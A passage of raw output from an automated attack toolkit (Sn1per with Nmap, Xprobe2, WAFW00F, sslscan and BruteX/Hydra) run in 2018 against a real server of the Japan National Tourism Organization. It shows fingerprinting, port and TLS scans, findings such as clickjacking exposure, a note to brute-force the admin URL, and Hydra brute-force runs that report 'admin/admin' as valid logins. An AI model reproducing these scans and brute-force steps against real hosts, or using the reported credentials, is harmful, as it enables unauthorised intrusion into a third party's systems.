  805. ----------------------------------------
  806. Traceback (most recent call last):
  807.  
  808. Target: http://202.79.244.228
  809.  
  810. Server: Apache
  811.  
  812.  
  813. ## NOTE: The Administrator URL was renamed. Bruteforce it. ##
  814. ## None of /administrator, /admin, /manage ##
  815.  
  816.  
  817. ## Checking if the target has deployed an Anti-Scanner measure
  818.  
  819. [!] Scanning Passed ..... OK
  820.  
  821.  
  822. ## Detecting Joomla! based Firewall ...
  823.  
  824. [!] .htaccess shipped with Joomla! is being deployed for SEO purpose
  825. [!] It contains some defensive mod_rewrite rules
  826. [!] Payloads that contain strings (mosConfig,base64_encode,<script>
  827. GLOBALS,_REQUEST) wil be responsed with 403.
  828.  
  829.  
  830. ## Fingerprinting in progress ...
  831.  
  832. ~Unable to detect the version. Is it sure a Joomla?
  833.  
  834. ## Fingerprinting done.
  835.  
  836.  
  837. ====================================================================================
  838. RUNNING NSLOOKUP
  839. ====================================================================================
  840. 228.244.79.202.in-addr.arpa name = bbt244-jnto-web01-228.jnto.go.jp.
  841.  
  842. Authoritative answers can be found from:
  843.  
  844. 228.244.79.202.in-addr.arpa domain name pointer bbt244-jnto-web01-228.jnto.go.jp.
  845. ====================================================================================
  846. CHECKING OS FINGERPRINT
  847. ====================================================================================
  848.  
  849. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  850.  
  851. [+] Target is 202.79.244.228
  852. [+] Loading modules.
  853. [+] Following modules are loaded:
  854. [x] [1] ping:icmp_ping - ICMP echo discovery module
  855. [x] [2] ping:tcp_ping - TCP-based ping discovery module
  856. [x] [3] ping:udp_ping - UDP-based ping discovery module
  857. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
  858. [x] [5] infogather:portscan - TCP and UDP PortScanner
  859. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
  860. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
  861. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
  862. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
  863. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
  864. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
  865. [x] [12] fingerprint:smb - SMB fingerprinting module
  866. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
  867. [+] 13 modules registered
  868. [+] Initializing scan engine
  869. [+] Running scan engine
  870. [-] ping:tcp_ping module: no closed/open TCP ports known on 202.79.244.228. Module test failed
  871. [-] ping:udp_ping module: no closed/open UDP ports known on 202.79.244.228. Module test failed
  872. [-] No distance calculation. 202.79.244.228 appears to be dead or no ports known
  873. [+] Host: 202.79.244.228 is down (Guess probability: 0%)
  874. [+] Cleaning up scan engine
  875. [+] Modules deinitialized
  876. [+] Execution completed.
  877.  
  878. ====================================================================================
  879. PINGING HOST
  880. ====================================================================================
  881. PING 202.79.244.228 (202.79.244.228) 56(84) bytes of data.
  882.  
  883. --- 202.79.244.228 ping statistics ---
  884. 1 packets transmitted, 0 received, 100% packet loss, time 0ms
  885.  
  886.  
  887. ====================================================================================
  888. RUNNING TCP PORT SCAN
  889. ====================================================================================
  890.  
  891. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-08 10:51 EST
  892. Nmap scan report for bbt244-jnto-web01-228.jnto.go.jp (202.79.244.228)
  893. Host is up (0.21s latency).
  894. Not shown: 470 filtered ports, 1 closed port
  895. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  896. PORT STATE SERVICE
  897. 80/tcp open http
  898. 443/tcp open https
  899.  
  900. Nmap done: 1 IP address (1 host up) scanned in 6.32 seconds
  901.  
  902. ====================================================================================
  903. RUNNING INTRUSIVE SCANS
  904. ====================================================================================
  905. + -- --=[Port 21 closed... skipping.
  906. + -- --=[Port 22 closed... skipping.
  907. + -- --=[Port 23 closed... skipping.
  908. + -- --=[Port 25 closed... skipping.
  909. + -- --=[Port 53 closed... skipping.
  910. + -- --=[Port 79 closed... skipping.
  911. + -- --=[Port 80 opened... running tests...
  912. ====================================================================================
  913. CHECKING FOR WAF
  914. ====================================================================================
  915.  
  916. ^ ^
  917. _ __ _ ____ _ __ _ _ ____
  918. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  919. | V V // o // _/ | V V // 0 // 0 // _/
  920. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  921. <
  922. ...'
  923.  
  924. WAFW00F - Web Application Firewall Detection Tool
  925.  
  926. By Sandro Gauci && Wendel G. Henrique
  927.  
  928. Checking http://202.79.244.228
  929. Generic Detection results:
  930. No WAF detected by the generic detection
  931. Number of requests: 13
  932.  
  933. ====================================================================================
  934. GATHERING HTTP INFO
  935. ====================================================================================
  936. http://202.79.244.228 [200 OK] Apache, Country[JAPAN][JP], Google-Analytics[UA-761127-3], HTTPServer[Apache], IP[202.79.244.228], JQuery[1.11.0], Script[text/javascript], Title[Japan National Tourism Organization Web Site], X-UA-Compatible[IE=EmulateIE7]
  937.  
  938. __ ______ _____
  939. \ \/ / ___|_ _|
  940. \ /\___ \ | |
  941. / \ ___) || |
  942. /_/\_|____/ |_|
  943.  
  944. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  945. + -- --=[Target: 202.79.244.228:80
  946. + -- --=[Site not vulnerable to Cross-Site Tracing!
  947. + -- --=[Site not vulnerable to Host Header Injection!
  948. + -- --=[Site vulnerable to Cross-Frame Scripting!
  949. + -- --=[Site vulnerable to Clickjacking!
  950.  
  951. HTTP/1.1 400 Bad Request
  952. Date: Mon, 08 Jan 2018 15:51:59 GMT
  953. Server: Apache
  954. Content-Length: 226
  955. Connection: close
  956. Content-Type: text/html; charset=iso-8859-1
  957.  
  958. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  959. <html><head>
  960. <title>400 Bad Request</title>
  961. </head><body>
  962. <h1>Bad Request</h1>
  963. <p>Your browser sent a request that this server could not understand.<br />
  964. </p>
  965. </body></html>
  966.  
  967. HTTP/1.1 400 Bad Request
  968. Date: Mon, 08 Jan 2018 15:52:00 GMT
  969. Server: Apache
  970. Content-Length: 226
  971. Connection: close
  972. Content-Type: text/html; charset=iso-8859-1
  973.  
  974. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  975. <html><head>
  976. <title>400 Bad Request</title>
  977. </head><body>
  978. <h1>Bad Request</h1>
  979. <p>Your browser sent a request that this server could not understand.<br />
  980. </p>
  981. </body></html>
  982.  
  983.  
  984.  
  985.  
  986. ====================================================================================
  987. CHECKING HTTP HEADERS
  988. ====================================================================================
  989. + -- --=[Checking if X-Content options are enabled on 202.79.244.228...
  990.  
  991. + -- --=[Checking if X-Frame options are enabled on 202.79.244.228...
  992.  
  993. + -- --=[Checking if X-XSS-Protection header is enabled on 202.79.244.228...
  994.  
  995. + -- --=[Checking HTTP methods on 202.79.244.228...
  996. Allow: HEAD,HEAD,GET,HEAD,POST,OPTIONS
  997.  
  998. + -- --=[Checking if TRACE method is enabled on 202.79.244.228...
  999.  
  1000. + -- --=[Checking for META tags on 202.79.244.228...
  1001. <meta http-equiv="content-type" content="text/html; charset=UTF-8" />
  1002. <meta http-equiv="content-style-type" content="text/css" />
  1003. <meta http-equiv="content-script-type" content="text/javascript" />
  1004. <meta http-equiv="imagetoolbar" content="no" />
  1005. <meta name="MSSmartTagsPreventParsing" content="true" />
  1006. <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" >
  1007. <meta name="description" content="JNTO is involved in a broad range of activities promoting travel to Japan through various activities overseas as well as tourism-promoting activities in Japan." />
  1008. <meta name="keywords" content="Japan National Tourism Organization, Japan Travel" />
  1009.  
  1010. + -- --=[Checking for open proxy on 202.79.244.228...
  1011. </div>
  1012. <!--/contents-->
  1013. <!--==========CONTENTS end==========-->
  1014. </div>
  1015. <!--/wrapperinner-->
  1016. </div>
  1017. <!--/wrapper-->
  1018.  
  1019. </body>
  1020. </html>
  1021.  
  1022. + -- --=[Enumerating software on 202.79.244.228...
  1023. Server: Apache
  1024.  
  1025. + -- --=[Checking if Strict-Transport-Security is enabled on 202.79.244.228...
  1026.  
  1027. + -- --=[Checking for Flash cross-domain policy on 202.79.244.228...
  1028. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1029. <html><head>
  1030. <title>404 Not Found</title>
  1031. </head><body>
  1032. <h1>Not Found</h1>
  1033. <p>The requested URL /crossdomain.xml was not found on this server.</p>
  1034. </body></html>
  1035.  
  1036. + -- --=[Checking for Silverlight cross-domain policy on 202.79.244.228...
  1037. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1038. <html><head>
  1039. <title>404 Not Found</title>
  1040. </head><body>
  1041. <h1>Not Found</h1>
  1042. <p>The requested URL /clientaccesspolicy.xml was not found on this server.</p>
  1043. </body></html>
  1044.  
  1045. + -- --=[Checking for HTML5 cross-origin resource sharing on 202.79.244.228...
  1046.  
  1047. + -- --=[Retrieving robots.txt on 202.79.244.228...
  1048. User-agent: bingbot
  1049. Crawl-Delay: 5
  1050.  
  1051. User-agent: AhrefsBot
  1052. Disallow: /
  1053.  
  1054. User-agent: BLEXBot
  1055. Disallow: /
  1056. + -- --=[Retrieving sitemap.xml on 202.79.244.228...
  1057. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1058. <html><head>
  1059. <title>404 Not Found</title>
  1060. </head><body>
  1061. <h1>Not Found</h1>
  1062. <p>The requested URL /sitemap.xml was not found on this server.</p>
  1063. </body></html>
  1064.  
  1065. + -- --=[Checking cookie attributes on 202.79.244.228...
  1066.  
  1067. + -- --=[Checking for ASP.NET Detailed Errors on 202.79.244.228...
  1068.  
  1069.  
  1070. ====================================================================================
  1071. SAVING SCREENSHOTS
  1072. ====================================================================================
  1073. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/202.79.244.228-port80.jpg
  1074. libpng warning: iCCP: known incorrect sRGB profile
  1075. libpng warning: iCCP: known incorrect sRGB profile
  1076. + -- --=[Port 110 closed... skipping.
  1077. + -- --=[Port 111 closed... skipping.
  1078. + -- --=[Port 135 closed... skipping.
  1079. + -- --=[Port 139 closed... skipping.
  1080. + -- --=[Port 161 closed... skipping.
  1081. + -- --=[Port 162 closed... skipping.
  1082. + -- --=[Port 389 closed... skipping.
  1083. + -- --=[Port 443 opened... running tests...
  1084. ====================================================================================
  1085. CHECKING FOR WAF
  1086. ====================================================================================
  1087.  
  1088. ^ ^
  1089. _ __ _ ____ _ __ _ _ ____
  1090. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  1091. | V V // o // _/ | V V // 0 // 0 // _/
  1092. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  1093. <
  1094. ...'
  1095.  
  1096. WAFW00F - Web Application Firewall Detection Tool
  1097.  
  1098. By Sandro Gauci && Wendel G. Henrique
  1099.  
  1100. Checking https://202.79.244.228
  1101. Traceback (most recent call last):
  1102. File "/usr/bin/wafw00f", line 8, in <module>
  1103. main()
  1104. File "/usr/lib/python2.7/dist-packages/wafw00f/__init__.py", line 808, in main
  1105. if attacker.normalrequest() is None:
  1106. File "/usr/lib/python2.7/dist-packages/wafw00f/__init__.py", line 96, in normalrequest
  1107. return self.request(usecache=usecache, cacheresponse=cacheresponse, headers=headers)
  1108. File "/usr/lib/python2.7/dist-packages/wafw00f/lib/evillib.py", line 323, in request
  1109. h.request(method, path, headers=headers)
  1110. File "/usr/lib/python2.7/httplib.py", line 1042, in request
  1111. self._send_request(method, url, body, headers)
  1112. File "/usr/lib/python2.7/httplib.py", line 1082, in _send_request
  1113. self.endheaders(body)
  1114. File "/usr/lib/python2.7/httplib.py", line 1038, in endheaders
  1115. self._send_output(message_body)
  1116. File "/usr/lib/python2.7/httplib.py", line 882, in _send_output
  1117. self.send(msg)
  1118. File "/usr/lib/python2.7/httplib.py", line 844, in send
  1119. self.connect()
  1120. File "/usr/lib/python2.7/httplib.py", line 1263, in connect
  1121. server_hostname=server_hostname)
  1122. File "/usr/lib/python2.7/ssl.py", line 369, in wrap_socket
  1123. _context=self)
  1124. File "/usr/lib/python2.7/ssl.py", line 617, in __init__
  1125. self.do_handshake()
  1126. File "/usr/lib/python2.7/ssl.py", line 854, in do_handshake
  1127. match_hostname(self.getpeercert(), self.server_hostname)
  1128. File "/usr/lib/python2.7/ssl.py", line 288, in match_hostname
  1129. % (hostname, ', '.join(map(repr, dnsnames))))
  1130. ssl.CertificateError: hostname '202.79.244.228' doesn't match either of 'action.jnto.go.jp', 'cms-eng.jnto.go.jp', 'fileserver.jnto.go.jp', 'japan-magazine.jnto.go.jp', 'japan-photo.jnto.go.jp', 'japan-tours.jnto.go.jp', 'japanfreewifi.jnto.go.jp', 'jnto-cms01.jnto.go.jp', 'magazine.jnto.go.jp', 'mice.jnto.go.jp', 'recruit.jnto.go.jp', 'shorttrips.jnto.go.jp', 'tax-freeshop.jnto.go.jp', 'tic.jnto.go.jp', 'visit-japan.jp', 'weblog-analytics.jnto.go.jp', 'welcome2japan.hk', 'www.camnhannhatban.vn', 'www.japanmeetings.org', 'www.jnto.go.jp', 'www.welcome2japan.hk'
  1131.  
  1132. ====================================================================================
  1133. GATHERING HTTP INFO
  1134. ====================================================================================
  1135. https://202.79.244.228 [200 OK] Apache, Country[JAPAN][JP], Google-Analytics[UA-761127-3], HTTPServer[Apache], IP[202.79.244.228], JQuery[1.11.0], Script[text/javascript], Title[Japan National Tourism Organization Web Site], X-UA-Compatible[IE=EmulateIE7]
  1136.  
  1137. ====================================================================================
  1138. GATHERING SSL/TLS INFO
  1139. ====================================================================================
  1140.  
  1141.  
  1142.  
  1143. AVAILABLE PLUGINS
  1144. -----------------
  1145.  
  1146. PluginHSTS
  1147. PluginOpenSSLCipherSuites
  1148. PluginCertInfo
  1149. PluginSessionRenegotiation
  1150. PluginCompression
  1151. PluginChromeSha1Deprecation
  1152. PluginSessionResumption
  1153. PluginHeartbleed
  1154.  
  1155.  
  1156.  
  1157. CHECKING HOST(S) AVAILABILITY
  1158. -----------------------------
  1159.  
  1160. 202.79.244.228:443 => 202.79.244.228:443
  1161.  
  1162.  
  1163.  
  1164. SCAN RESULTS FOR 202.79.244.228:443 - 202.79.244.228:443
  1165. --------------------------------------------------------
  1166.  
  1167. * Deflate Compression:
  1168. OK - Compression disabled
  1169.  
  1170. * Session Renegotiation:
  1171. Client-initiated Renegotiations: OK - Rejected
  1172. Secure Renegotiation: OK - Supported
  1173.  
  1174. * Certificate - Content:
  1175. SHA1 Fingerprint: 7dd7d4791b10d074943f91787c53e9cce000f94f
  1176. Common Name: None
  1177. Issuer: COMODO RSA Domain Validation Secure Server CA
  1178. Serial Number: 99CF75306B58D457D0A07E7C9E04BAE2
  1179. Not Before: Sep 6 00:00:00 2017 GMT
  1180. Not After: Mar 14 23:59:59 2018 GMT
  1181. Signature Algorithm: sha256WithRSAEncryption
  1182. Public Key Algorithm: rsaEncryption
  1183. Key Size: 2048 bit
  1184. Exponent: 65537 (0x10001)
  1185. X509v3 Subject Alternative Name: {'DNS': ['action.jnto.go.jp', 'cms-eng.jnto.go.jp', 'fileserver.jnto.go.jp', 'japan-magazine.jnto.go.jp', 'japan-photo.jnto.go.jp', 'japan-tours.jnto.go.jp', 'japanfreewifi.jnto.go.jp', 'jnto-cms01.jnto.go.jp', 'magazine.jnto.go.jp', 'mice.jnto.go.jp', 'recruit.jnto.go.jp', 'shorttrips.jnto.go.jp', 'tax-freeshop.jnto.go.jp', 'tic.jnto.go.jp', 'visit-japan.jp', 'weblog-analytics.jnto.go.jp', 'welcome2japan.hk', 'www.camnhannhatban.vn', 'www.japanmeetings.org', 'www.jnto.go.jp', 'www.welcome2japan.hk']}
  1186.  
  1187. * Certificate - Trust:
  1188. Hostname Validation: FAILED - Certificate does NOT match 202.79.244.228
  1189. Google CA Store (09/2015): OK - Certificate is trusted
  1190. Java 6 CA Store (Update 65): OK - Certificate is trusted
  1191. Microsoft CA Store (09/2015): OK - Certificate is trusted
  1192. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
  1193. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
  1194. Certificate Chain Received: ['PositiveSSL Multi-Domain', 'COMODO RSA Domain Validation Secure Server CA', 'COMODO RSA Certification Authority']
  1195.  
  1196. * Certificate - OCSP Stapling:
  1197. NOT SUPPORTED - Server did not send back an OCSP response.
  1198.  
  1199. * Session Resumption:
  1200. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  1201. With TLS Session Tickets: OK - Supported
  1202.  
  1203. * SSLV2 Cipher Suites:
  1204. Server rejected all cipher suites.
  1205.  
  1206. * SSLV3 Cipher Suites:
  1207. Server rejected all cipher suites.
  1208.  
  1209.  
  1210.  
  1211. SCAN COMPLETED IN 4.13 S
  1212. ------------------------
  1213. Version: 1.11.10-static
  1214. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  1215.  
  1216. Testing SSL server 202.79.244.228 on port 443 using SNI name 202.79.244.228
  1217.  
  1218. TLS Fallback SCSV:
  1219. Server supports TLS Fallback SCSV
  1220.  
  1221. TLS renegotiation:
  1222. Secure session renegotiation supported
  1223.  
  1224. TLS Compression:
  1225. Compression disabled
  1226.  
  1227. Heartbleed:
  1228. TLS 1.2 not vulnerable to heartbleed
  1229. TLS 1.1 not vulnerable to heartbleed
  1230. TLS 1.0 not vulnerable to heartbleed
  1231.  
  1232. Supported Server Cipher(s):
  1233. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  1234. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  1235. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1236. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
  1237. Accepted TLSv1.2 256 bits AES256-SHA256
  1238. Accepted TLSv1.2 256 bits AES256-SHA
  1239. Accepted TLSv1.2 256 bits CAMELLIA256-SHA
  1240. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  1241. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  1242. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1243. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
  1244. Accepted TLSv1.2 128 bits AES128-SHA256
  1245. Accepted TLSv1.2 128 bits AES128-SHA
  1246. Accepted TLSv1.2 128 bits SEED-SHA
  1247. Accepted TLSv1.2 128 bits CAMELLIA128-SHA
  1248. Accepted TLSv1.2 128 bits IDEA-CBC-SHA
  1249. Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
  1250. Accepted TLSv1.2 112 bits DES-CBC3-SHA
  1251. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1252. Accepted TLSv1.1 256 bits AES256-SHA
  1253. Accepted TLSv1.1 256 bits CAMELLIA256-SHA
  1254. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1255. Accepted TLSv1.1 128 bits AES128-SHA
  1256. Accepted TLSv1.1 128 bits SEED-SHA
  1257. Accepted TLSv1.1 128 bits CAMELLIA128-SHA
  1258. Accepted TLSv1.1 128 bits IDEA-CBC-SHA
  1259. Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
  1260. Accepted TLSv1.1 112 bits DES-CBC3-SHA
  1261. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1262. Accepted TLSv1.0 256 bits AES256-SHA
  1263. Accepted TLSv1.0 256 bits CAMELLIA256-SHA
  1264. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1265. Accepted TLSv1.0 128 bits AES128-SHA
  1266. Accepted TLSv1.0 128 bits SEED-SHA
  1267. Accepted TLSv1.0 128 bits CAMELLIA128-SHA
  1268. Accepted TLSv1.0 128 bits IDEA-CBC-SHA
  1269. Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
  1270. Accepted TLSv1.0 112 bits DES-CBC3-SHA
  1271.  
  1272. SSL Certificate:
  1273. Signature Algorithm: sha256WithRSAEncryption
  1274. RSA Key Strength: 2048
  1275.  
  1276. Subject: /OU=Domain Control Validated/OU=Hosted by Comodo Japan Inc/OU=PositiveSSL Multi-Domain
  1277. Altnames: DNS:action.jnto.go.jp, DNS:cms-eng.jnto.go.jp, DNS:fileserver.jnto.go.jp, DNS:japan-magazine.jnto.go.jp, DNS:japan-photo.jnto.go.jp, DNS:japan-tours.jnto.go.jp, DNS:japanfreewifi.jnto.go.jp, DNS:jnto-cms01.jnto.go.jp, DNS:magazine.jnto.go.jp, DNS:mice.jnto.go.jp, DNS:recruit.jnto.go.jp, DNS:shorttrips.jnto.go.jp, DNS:tax-freeshop.jnto.go.jp, DNS:tic.jnto.go.jp, DNS:visit-japan.jp, DNS:weblog-analytics.jnto.go.jp, DNS:welcome2japan.hk, DNS:www.camnhannhatban.vn, DNS:www.japanmeetings.org, DNS:www.jnto.go.jp, DNS:www.welcome2japan.hk
  1278. Issuer: COMODO RSA Domain Validation Secure Server CA
  1279.  
  1280. + -- --=[MÄŚŚBĻËËĐ V20160303 BŸ 1Ņ3 @ ĊŖÖŴĐŚȞÏËĻĐ - https://crowdshield.com
  1281. + -- --=[Checking for DROWN (SSLv2): 202.79.244.228:443
  1282. + -- --=[Checking for HeartBleed: 202.79.244.228:443
  1283. + -- --=[Checking for OpenSSL CCS: 202.79.244.228:443
  1284. + -- --=[Checking for Poodle (SSLv3): 202.79.244.228:443
  1285. + -- --=[Checking for WinShock (MS14-066): 202.79.244.228:443
  1286. Testing if OpenSSL supports the ciphers we are checking for: YES
  1287.  
  1288. Testing 202.79.244.228:443 for availability of SSL ciphers added in MS14-066...
  1289. Testing cipher DHE-RSA-AES256-GCM-SHA384: UNSUPPORTED
  1290. Testing cipher DHE-RSA-AES128-GCM-SHA256: UNSUPPORTED
  1291. Testing cipher AES256-GCM-SHA384: SUPPORTED
  1292. Testing cipher AES128-GCM-SHA256: SUPPORTED
  1293. Testing if IIS is running on port 443: NO
  1294. Checking if target system is running Windows Server 2012 or later...
  1295. Testing cipher ECDHE-RSA-AES256-SHA384: SUPPORTED
  1296. 202.79.244.228:443 is patched: UNKNOWN: Windows Server 2012 or later detected.
  1297. + -- --=[Scan Complete!
  1298. ====================================================================================
  1299. CHECKING HTTP HEADERS
  1300. ====================================================================================
  1301. + -- --=[Checking if X-Content options are enabled on 202.79.244.228...
  1302.  
  1303. + -- --=[Checking if X-Frame options are enabled on 202.79.244.228...
  1304.  
  1305. + -- --=[Checking if X-XSS-Protection header is enabled on 202.79.244.228...
  1306.  
  1307. + -- --=[Checking HTTP methods on 202.79.244.228...
  1308. Allow: HEAD,HEAD,GET,HEAD,POST,OPTIONS
  1309.  
  1310. + -- --=[Checking if TRACE method is enabled on 202.79.244.228...
  1311.  
  1312. + -- --=[Checking for META tags on 202.79.244.228...
  1313. <meta http-equiv="content-type" content="text/html; charset=UTF-8" />
  1314. <meta http-equiv="content-style-type" content="text/css" />
  1315. <meta http-equiv="content-script-type" content="text/javascript" />
  1316. <meta http-equiv="imagetoolbar" content="no" />
  1317. <meta name="MSSmartTagsPreventParsing" content="true" />
  1318. <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" >
  1319. <meta name="description" content="JNTO is involved in a broad range of activities promoting travel to Japan through various activities overseas as well as tourism-promoting activities in Japan." />
  1320. <meta name="keywords" content="Japan National Tourism Organization, Japan Travel" />
  1321.  
  1322. + -- --=[Checking for open proxy on 202.79.244.228...
  1323.  
  1324. + -- --=[Enumerating software on 202.79.244.228...
  1325. Server: Apache
  1326.  
  1327. + -- --=[Checking if Strict-Transport-Security is enabled on 202.79.244.228...
  1328.  
  1329. + -- --=[Checking for Flash cross-domain policy on 202.79.244.228...
  1330. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1331. <html><head>
  1332. <title>404 Not Found</title>
  1333. </head><body>
  1334. <h1>Not Found</h1>
  1335. <p>The requested URL /crossdomain.xml was not found on this server.</p>
  1336. </body></html>
  1337.  
  1338. + -- --=[Checking for Silverlight cross-domain policy on 202.79.244.228...
  1339. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1340. <html><head>
  1341. <title>404 Not Found</title>
  1342. </head><body>
  1343. <h1>Not Found</h1>
  1344. <p>The requested URL /clientaccesspolicy.xml was not found on this server.</p>
  1345. </body></html>
  1346.  
  1347. + -- --=[Checking for HTML5 cross-origin resource sharing on 202.79.244.228...
  1348.  
  1349. + -- --=[Retrieving robots.txt on 202.79.244.228...
  1350. User-agent: bingbot
  1351. Crawl-Delay: 5
  1352.  
  1353. User-agent: AhrefsBot
  1354. Disallow: /
  1355.  
  1356. User-agent: BLEXBot
  1357. Disallow: /
  1358. + -- --=[Retrieving sitemap.xml on 202.79.244.228...
  1359. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1360. <html><head>
  1361. <title>404 Not Found</title>
  1362. </head><body>
  1363. <h1>Not Found</h1>
  1364. <p>The requested URL /sitemap.xml was not found on this server.</p>
  1365. </body></html>
  1366.  
  1367. + -- --=[Checking cookie attributes on 202.79.244.228...
  1368.  
  1369. + -- --=[Checking for ASP.NET Detailed Errors on 202.79.244.228...
  1370.  
  1371. __________ __ ____ ___
  1372. \______ \_______ __ ___/ |_ ____ \ \/ /
  1373. | | _/\_ __ \ | \ __\/ __ \ \ /
  1374. | | \ | | \/ | /| | \ ___/ / \
  1375. |______ / |__| |____/ |__| \___ >___/\ \
  1376. \/ \/ \_/
  1377.  
  1378. + -- --=[BruteX v1.7 by 1N3
  1379. + -- --=[http://crowdshield.com
  1380.  
  1381.  
  1382. ################################### Running Port Scan ##############################
  1383.  
  1384. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-08 10:55 EST
  1385. Nmap scan report for bbt244-jnto-web01-228.jnto.go.jp (202.79.244.228)
  1386. Host is up (0.21s latency).
  1387. Not shown: 24 filtered ports
  1388. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  1389. PORT STATE SERVICE
  1390. 80/tcp open http
  1391. 443/tcp open https
  1392.  
  1393. Nmap done: 1 IP address (1 host up) scanned in 4.55 seconds
  1394.  
  1395. ################################### Running Brute Force ############################
  1396.  
  1397. + -- --=[Port 21 closed... skipping.
  1398. + -- --=[Port 22 closed... skipping.
  1399. + -- --=[Port 23 closed... skipping.
  1400. + -- --=[Port 25 closed... skipping.
  1401. + -- --=[Port 80 opened... running tests...
  1402. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  1403.  
  1404. Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-08 10:55:13
  1405. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
  1406. [DATA] attacking http-get://202.79.244.228:80//
  1407. [80][http-get] host: 202.79.244.228 login: admin password: admin
  1408. [STATUS] attack finished for 202.79.244.228 (valid pair found)
  1409. 1 of 1 target successfully completed, 1 valid password found
  1410. Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-08 10:55:15
  1411. + -- --=[Port 110 closed... skipping.
  1412. + -- --=[Port 139 closed... skipping.
  1413. + -- --=[Port 162 closed... skipping.
  1414. + -- --=[Port 389 closed... skipping.
  1415. + -- --=[Port 443 opened... running tests...
  1416. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  1417.  
  1418. Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-08 10:55:15
  1419. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
  1420. [DATA] attacking http-gets://202.79.244.228:443//
  1421. [443][http-get] host: 202.79.244.228 login: admin password: admin
  1422. [STATUS] attack finished for 202.79.244.228 (valid pair found)
  1423. 1 of 1 target successfully completed, 1 valid password found
  1424. Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-08 10:55:17
  1425. #######################################################################################################################################